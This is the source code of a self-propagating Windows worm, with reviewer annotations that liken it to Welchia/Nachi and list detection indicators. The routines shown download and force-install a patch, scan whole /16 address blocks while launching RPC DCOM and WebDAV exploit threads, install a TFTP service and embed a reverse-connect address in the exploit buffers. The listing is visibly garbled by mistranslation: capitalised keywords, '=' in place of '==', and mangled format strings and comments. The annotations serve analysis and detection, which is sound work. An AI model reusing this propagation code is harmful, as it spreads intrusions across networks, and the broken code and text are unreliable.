// doservicepackfunction: checks the OS version and a registry marker, picks a
// language-specific download URL, fetches an installer to "rpcservicepack.exe ",
// runs it, and forces a reboot when the registry check then reports it installed.
// Returns false on every early exit. Returns true once the installer process has
// ended within the timeout, whether or not the final registry check succeeds.
// NOTE(review): the listing is not compilable as shown. Keywords are capitalised and
// `=`, `|`, `&` appear where `==`, `||`, `&&` were presumably intended (this looks like
// an extraction/translation artefact). The notes below read the code on that assumption.
// NOTE(review): taken together with the other routines on this page, the behaviour is
// consistent with public write-ups of the 2003 Welchia/Nachi worm. That attribution is
// inferred from behaviour, not stated on the page.
// Triage artefacts visible in this routine: a file named rpcservicepack.exe that is
// written and later deleted, a child process started from it, and a forced reboot.
Bool doservicepackfunction ()
{
DWORD nsystemver = win2000orxp ();
// Only the values 0 and 1 are accepted; the original comment maps them to 2000 and XP.
If (! (Nsystemver = 0 | nsystemver = 1 ))
Return false; // not 2 K or XP
// readregservicepack is defined elsewhere; a non-zero result is treated as "already patched".
If (readregservicepack (nsystemver ))
Return false; // already installed
// Recognition language version
// The OEM code page plus the primary and sub language IDs of the system default LCID
// select an index into the URL tables used further down.
Int nlanguageid;
Unsigned int unoemcp = getoemcp ();
Lcid = getsystemdefaultlcid ();
Word wmain = primarylangid (lcid );
Word wsub = sublangid (lcid );
If (unoemcp = 437 & wmain = 9 & wsub = 1) // en
Nlanguageid = 0; // your en patch is good ~~ What's wrong ~~
// Small Europe ~~ Russian cool people have their own gameplay ~~
Else if (unoemcp = 936 & wmain = 4 & wsub = 2) // CN
Nlanguageid = 1; // it is for this ~~
Else if (unoemcp = 950 & wmain = 4 & wsub = 1) // TW
Nlanguageid = 2; // You must help ~~
// The JP branch assigns -1, the same value as the fallback branch, so this routine
// returns before any download on systems that match it.
Else if (unoemcp = 932 & wmain = 0x11 & wsub = 1) // JP
Nlanguageid =-1; // I am so impulsive to kill the devil's sub-machine!
// No. When is the report ~~~ Hope he is new ~~~ If you try again, it will destroy him ~~
Else if (unoemcp = 949 & wmain = 0x12 & wsub = 1) // KR
Nlanguageid = 3; // the little birds who do not understand things bend out, endangering China ~~
Else {
Nlanguageid =-1;
}
If (nlanguageid =-1)
Return false;
// The literal keeps a trailing space, so the command line built below separates the
// file name from whatever follows it.
Char szservicepack [] = "rpcservicepack.exe ";
// Downlaod it ~~~
// szwin2kspurl and szwinxpspurl are URL tables defined elsewhere, indexed by nlanguageid.
// NOTE(review): no integrity or signature check on the downloaded file is visible here
// before it is executed. downloadspfile is defined elsewhere, so confirm there.
If (! Nsystemver) {// 2 K
If (! Downloadspfile (szservicepack, szwin2kspurl [nlanguageid])
Return false;
}
Else {
If (! Downloadspfile (szservicepack, szwinxpspurl [nlanguageid])
Return false;
}
// The format string is garbled; presumably it was "%s" followed by installer switches
// for an unattended, no-prompt install -- confirm against an unmangled copy.
Char szexec [180];
Sprintf (szexec, "% S-N-o-z-Q", szservicepack );
// makeprocess is defined elsewhere; a NULL handle is treated as a failed launch.
Handle hprocess = makeprocess (szexec );
If (hprocess = NULL)
Return false;
// Wait up to 360000 ms for the installer. On any other wait result the process is
// terminated, the handle closed and the downloaded file deleted.
If (waitforsingleobject (hprocess, 360000 )! = Wait_object_0) {// unfinished within six minutes
Terminateprocess (hprocess, 1 );
Closehandle (hprocess );
Deletefile (szservicepack );
Return false;
}
Closehandle (hprocess );
// 15 s pause before the installer file is deleted.
Sleep (15000 );
Deletefile (szservicepack );
// The registry marker is read again; only when it now reports the patch as present is
// a forced reboot requested (ewx_force is combined with ewx_reboot).
If (readregservicepack (nsystemver )){
Shutdownwindows (ewx_reboot | ewx_force); // install Service Pack OK, reboot it ~~~
Sleep (20000); // does it mean that I have restarted? It is invalid if you do not restart the patch. Please contact Bill to handle it ~~~
}
Return true;
}
// In: start IP address, number of class B segments, whether to choose addresses at random, and whether to switch to WebDAV // worse ~~~ Watch it together ~~~
// beginexploitfunction: walks nbcount * 256 * 256 candidate addresses and starts one
// worker thread for each candidate that passes the filter below.
//   ulipstart - base of the sequential walk; not read when brand is set.
//   nbcount   - number of 65536-address blocks to cover.
//   brand     - when set, each candidate comes from makerandip () instead of I + ulipstart.
//   bwebdav   - selects exploitwebdavthread rather than exploitrpcdcomthread as the
//               thread entry point (both are defined elsewhere).
// NOTE(review): the listing is not compilable as shown. `=`, `|`, `&`, `>` appear where
// `==`, `||`, `&&`, `>>` were presumably intended (extraction/translation artefact).
// Detection note: in sequential mode this makes a single host work through consecutive
// addresses across whole 65536-address blocks, paced by the Sleep (2) calls and capped
// at nmaxthread concurrent workers. That fan-out from one source is presumably what
// flow or connection logs would show; the traffic itself is generated in the thread
// routines, which are not on this page.
Void beginexploitfunction (u_long ulipstart, int nbcount, bool brand, bool bwebdav)
{
Handle hthread = NULL;
Bool bfirst = true;
U_long ucomp;
For (INT I = 0; I <(nbcount * 256*256); I ++ ){
If (brand)
Ucomp = makerandip ();
Else
Ucomp = I + ulipstart;
// Filter: the candidate is skipped when a byte at any of the four tested offsets equals
// 0xc5, or a 16-bit word at any of the three tested offsets equals 0x9999. The original
// comment indicates some targets are excluded on purpose; why these values is not
// visible here.
If (// still blocks some targets, so that the next generation will be killed after the target is recruited. Do not destroy the Next Generation :)~~~
(Byte) ucomp = 0xc5 |
(Byte) (ucomp> 8) = 0xc5 |
(Byte) (ucomp> 16) = 0xc5 |
(Byte) (ucomp> 24) = 0xc5 |
(Word) ucomp = 0x9999 |
(Word) (ucomp> 8) = 0x9999 |
(Word) (ucomp> 16) = 0x9999)
Continue;
// One heap-allocated u_long per candidate carries the address to the worker thread.
// The allocation is retried once after 100 ms; if it is still NULL the candidate is
// dropped without a thread being started.
U_long * mypara = new u_long;
If (mypara = NULL) {// if the allocation fails, try again
Sleep (100 );
Mypara = new u_long;
}
If (mypara ){
// The handle of the previously created thread is closed before the next thread is
// created; the threads themselves are not waited on here.
If (hthread)
Closehandle (hthread );
// The address is stored in network byte order. Who releases mypara is not visible in
// this routine -- presumably the thread routine; confirm there.
* Mypara = htonl (ucomp );
DWORD dwthreadid;
If (bwebdav)
Hthread = createthread (null, 0, exploitwebdavthread, (lpvoid) mypara, 0, & dwthreadid );
Else
Hthread = createthread (null, 0, exploitrpcdcomthread, (lpvoid) mypara, 0, & dwthreadid );
Sleep (2 );
}
// Add the code here to avoid the first execution of interlockedincrement (& g_curthreadcount) in the thread before it can run. A bug of n threads is created at one time!
// One-off 2 s pause the first time I reaches nmaxthread, so that (per the comment above)
// already started threads get to increment g_curthreadcount before the throttle reads it.
If (bfirst & (I >= nmaxthread )){
Sleep (2000 );
Bfirst = false;
}
// Throttle: polls every 2 ms until the worker count drops below nmaxthread. The
// original comment gives nmaxthread as 300; the definition itself is not on this page.
While (g_curthreadcount> = nmaxthread) // # define nmaxthread 300, not careful. I 've played it ~~~
Sleep (2 );
}
// 60 s pause after the last candidate before returning to the caller.
Sleep (60000 );
}
// Main routine shared by service mode and console mode
// doit: top-level routine. In order: starts Winsock 2.2, calls killmsblast (), removes
// itself when the local year is 2004, prepares the send buffers, runs the patch
// routine, starts a receiving thread and a TFTP service, then loops forever over four
// scan phases.
// NOTE(review): the listing is not compilable as shown. `=` appears where `==` was
// presumably intended, "For (;)" was presumably "for (;;)", and "Wsadatawsd" was
// presumably a WSADATA declaration (extraction/translation artefact).
// NOTE(review): the combination visible here (removing another worm, patching the host,
// a 0xAA-style ping buffer, a TFTP service, self-removal in 2004) is consistent with
// public write-ups of the 2003 Welchia/Nachi worm. That attribution is inferred from
// behaviour, not stated on the page.
// Host indicators suggested by this routine: the services named by szservicename and
// szservicetftpd (their values are not on this page), a TFTP service being installed,
// and both services being deleted once the local clock reads 2004.
Void doit ()
{
Wsadatawsd;
If (wsastartup (makeword (2, 2), & WSD )! = 0)
Return;
// Kills worms
// killmsblast is defined elsewhere; it is called here and again at the end of every
// scan cycle.
Killmsblast ();
// Uninstall
// Self-removal keys on the local clock (getlocaltime), so it follows the host's own
// time setting: when the year is 2004 both services are deleted, removeme () is called
// and the process exits.
Systemtime st;
Getlocaltime (& St );
If (St. wyear = 2004 ){
Mydeleteservice (szservicename );
Mydeleteservice (szservicetftpd );
Removeme ();
Exitprocess (1); // actually not required. removeme () borrowed the code from its predecessors. In 2 K, when exiting the program, the file is deleted.
}
Srand (gettickcount ());
// The fill argument is garbled; presumably it was the byte 0xAA. If ppingbuffer is the
// ICMP echo payload, as the original comment below implies, echo requests carrying a
// run of 0xAA bytes are a network signature for this code -- confirm against the send path.
Memset (ppingbuffer, "/xAA", sizeof (ppingbuffer ));
// The Backbone Router immediately discards this icmp echo packet! What wave in China has exceeded !~~ The patch is enough !~~~
// Prepare the WebDAV sending Buffer
// Retries the 68000-byte allocation every 100 ms until it is non-NULL.
Do {
Pwebdavexploitbuffer = new char [68000];
Sleep (100 );
} While (pwebdavexploitbuffer = NULL );
// A bullet must be assembled at one time before checkonlien
// The two press...once routines and checkonlienandpressdata are defined elsewhere. Per
// the original comments they build the send buffers once and then write the local IP
// and the reverse-connection address and port into them.
Presswebdavbufferonce ();
Pressrpcdcombufferonce ();
Checkonlienandpressdata (); // get localip & fixed reverse IP and port in the bullet
// Patch
// Return value is ignored; scanning continues whether or not the patch was applied.
Doservicepackfunction ();
// Create a receiving thread
DWORD dwthreadid;
Handle hworkthread = createthread (null, 0, (lpthread_start_routine) recvsend1_thread, (lpvoid) null, 0, & dwthreadid );
If (hworkthread = NULL) // blocked in recvsendmediathread, with anti-connection, re-thread processing, and multiple anti-connections at the same time
Return;
Closehandle (hworkthread );
// If the TFTP service cannot be started it is installed and started again; the result
// of the second start is not checked.
If (! Mystartservice (szservicetftpd )){
Sleep (1000 );
Installtftpservice ();
Sleep (1000 );
Mystartservice (szservicetftpd );
}
Sleep (2000); // wait for the global Rand bind port in the receiving thread
U_long ulip;
// Endless cycle of four phases; nothing in this loop breaks out of it, so the code
// after the loop is not reached.
For (;) {// estimated, a cycle of 2 hours for a common Machine
// First scan this IP segment
// Phase 1: the local address with its low 16 bits cleared, one block, sequential.
Checkonlienandpressdata ();
Ulip = ntohl (inet_addr (szlocalip ));
Ulip & = 0xffff0000;
Beginexploitfunction (ulip, 1, 0, 0 );
// Scan the three segments before and after the current IP Address
// Phase 2: the base moves up by one block or down by three (coin flip), then three
// consecutive blocks are walked sequentially.
Checkonlienandpressdata ();
If (RAND () % 2)
Ulip + = 0x00010000;
Else
Ulip-= 0x00030000;
Beginexploitfunction (ulip, 3, 0, 0 );
// Scan a WebDAV segment and exit the 135 SYN block.
// Phase 3: the high 16 bits come from wdiphead (a table defined elsewhere, indexed
// 0..75 here); one block, sequential, WebDAV thread.
Checkonlienandpressdata ();
Ulip = makelong (0, wdiphead [rand () % 76]); // please pay attention to the IP address provider of segment B ~~~, Take remedial measures now ~~~ Sorry ~~~
Beginexploitfunction (ulip, 1, 0, 1 );
// Scan the random IP address again. The number of IP addresses is 1 segment B, RPC or WebDAV.
// Phase 4: random mode, so ulip is not used by the callee; a coin flip chooses the
// RPC DCOM or the WebDAV thread.
Checkonlienandpressdata ();
If (RAND () % 2)
Beginexploitfunction (ulip, 1, 1, 0 );
Else
Beginexploitfunction (ulip, 1, 1, 1); // Skip, skip, and skip ~~~
Killmsblast ();
}
// Wsacleanup ();
}